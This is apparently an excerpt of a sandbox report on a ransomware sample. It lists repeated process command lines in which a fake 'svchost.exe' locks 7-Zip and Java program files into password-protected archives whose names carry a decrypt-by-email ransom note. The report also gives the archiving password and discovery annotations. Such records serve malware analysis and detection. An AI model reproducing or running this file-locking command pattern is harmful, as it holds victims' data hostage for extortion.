  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mn.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng2.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mr.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ms.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ms.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nb.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ne.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ne.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nn.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pa-in.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ps.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ps.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt-br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2576
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ro.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ro.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ru.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ru.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sa.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\si.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\si.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sk.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sq.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sq.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sv.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sw.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ta.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ta.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tg.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1252
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\th.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\th.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:308
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tk.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tr.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tt.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ug.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ug.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uk.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2260
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\va.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\va.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\vi.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\vi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\yo.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\yo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\License.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\License.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\readme.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\7-Zip\readme.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\DisableLock.xls(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\DisableLock.xls" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1848
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
